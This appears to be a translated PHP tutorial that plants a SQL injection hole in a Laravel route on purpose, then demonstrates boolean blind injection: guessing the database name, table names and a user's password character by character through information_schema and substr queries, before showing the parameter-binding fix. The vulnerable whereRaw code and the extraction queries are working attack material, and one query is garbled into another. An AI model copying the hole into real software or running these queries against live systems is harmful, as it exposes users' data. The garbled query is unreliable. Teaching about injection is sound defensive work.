This article brings you relevant knowledge about laravel, which mainly introduces how to explain the principle of SQL blind injection by creating a laravel vulnerability. The so-called blind injection means that there is no error response from the server. Let’s take a look at the injection attack completed when displaying. I hope it will be helpful to everyone.

[Related recommendations: laravel video tutorial】
Environment
1 2 3 4 5 6 7 8 | composer create-project laravel/laravel lar9
DEBUG=false
DB_HOST=....
php artisan migrate
php artisan serve
insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');
|
Copy after login
Create vulnerability
1 2 3 4 5 6 7 | Route::get('/', function () {
$id = request()->id;
$user = \App\Models\User::whereRaw('id = '. $id )->first();
return $user ->name ?? '';
});
|
Copy after login
Test
Steps
Database name
Guess Find the length of the data name
1 2 3 4 | url: http:
select * from users where id = 1 and length(database()) = 1
select * from users where id = 1 and length(database()) = 2
|
Copy after login
Guess the database name
1 2 3 4 | 从第一步 知道了数据库名长度
`select * from users where id = 1 and substr (database(),1,1) =a`
`select * from users where id = 1 and substr (database(),1,1) =b`
|
Copy after login
Finally: laravel_project
Table name
The following steps and guessing The database is almost the same, so I’ll just talk about it briefly.
information_schema
information_schema comes with mysql.
The database name, table name, column type, etc. are all recorded. Guess the table fields need to be obtained from this database. Come.
Guess the number of tables in laravel_project
1 2 3 4 5 6 7 | url: http:
mysql> select count (*) from information_schema.tables where table_schema = "laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct" ;
+----------+
| count (*) |
+----------+
| 5 |
+----------+
|
Copy after login
Guess the length of the first table name
With [guess the data name Length] This is not much.
Guess the first table name
1 2 3 4 5 6 7 8 | url: http:
mysql> select substr (table_name,1,1) from information_schema.tables where table_schema = "laravel_project" limit 0,1;
+------------------------+
| substr (table_name,1,1) |
+------------------------+
| f |
+------------------------+
|
Copy after login
Finally the first table name is: failed_jobs
Guess the field
The same logic as guessing the table.
1 | select count (column_name) from information_schema.columns where table_name= 'failed_jobs';
|
Copy after login
Guess the data
Data This is the most important thing.
Because failed_jobs has no data, I changed it to users.
users has a password field.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | mysql> select substr ((select password from users limit 0,1),1,1);
+----------------------------------------------------+
| substr ((select password from users limit 0,1),1,1) |
+----------------------------------------------------+
| w |
+----------------------------------------------------+
得出第一个是w,存起来,最后判断
mysql> select substr ((select password from users limit 0,1),1,2);
+----------------------------------------------------+
| substr ((select password from users limit 0,1),1,2) |
+----------------------------------------------------+
| wo |
+----------------------------------------------------+
第二个值为o
用第一个值 + 第二个值作为盲注
|
Copy after login
......
Defense
(Sometimes where does not meet the needs, you need whereRaw)
If necessary, remember Just bind it.
1 2 3 4 5 | Route::get('/', function () {
$id = request()->id;
$user = \App\Models\User::whereRaw('id = ?',[ $id ])->first();
return $user ->name ?? '';
});
|
Copy after login
As long as you use the framework safely, there will be no loopholes.
Those old projects are full of loopholes.
In this era, it is difficult to find loopholes.
Ps
For the sake of simplicity, the simplest search is used above.
Manual blind injection should use binary search.
1 2 3 | select * from users where id = 1 and substr (database(),1,1) ='a';
换成二分:
select * from users where id = 1 and ascii( substr (database(),1,1)) > 99;
|
Copy after login
It is best to use the tool sqlmap to scan it out directly.
[Related recommendations: laravel video tutorial]
The above is the detailed content of Parsing SQL blind injection principles through laravel vulnerability examples. For more information, please follow other related articles on the PHP Chinese website!